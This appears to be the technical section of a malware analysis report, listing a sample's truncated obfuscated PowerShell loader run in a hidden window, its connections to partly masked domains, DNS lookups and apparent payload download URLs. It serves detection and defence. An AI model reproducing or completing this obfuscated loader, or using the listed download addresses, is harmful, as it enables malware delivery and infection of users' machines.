Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' &( $eNv:COmspec[4,15,25]-joIN'')(((98, 41,45,51 ,9, 7 , 102 ,123 ,102 ,40,35, 49 , 107 ,41, 36, 44 , 35,37 ,50,102,52 ,39 ,40, 34,41 ,43,125, 98 , 19, 1 , 48,60,8 , 102 ,123, 102 , 40 ,35, 49 ,...
- 'po######businessimages.com':80
- 'in####ekatronik.com':80
- 'sa#####ika-kohler.ru':80
- 'sa#####ika-kohler.ru':443
- http://po######businessimages.com/JJBZ2k/
- http://www.in####ekatronik.com/cPIbc/
- http://sa#####ika-kohler.ru/system/helper/4pKGw/
- 'sa#####ika-kohler.ru':443
- DNS ASK po######businessimages.com
- DNS ASK ho##d24.by
- DNS ASK in####ekatronik.com
- DNS ASK 7.###orod.z8.ru
- DNS ASK sa#####ika-kohler.ru
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' &( $eNv:COmspec[4,15,25]-joIN'')(((98, 41,45,51 ,9, 7 , 102 ,123 ,102 ,40,35, 49 , 107 ,41, 36, 44 , 35,37 ,50,102,52 ,39 ,40, 34,41 ,43,125, 98 , 19, 1 , 48,60,8 , 102 ,123, 102 , 40 ,35, 49 ,...' (with hidden window)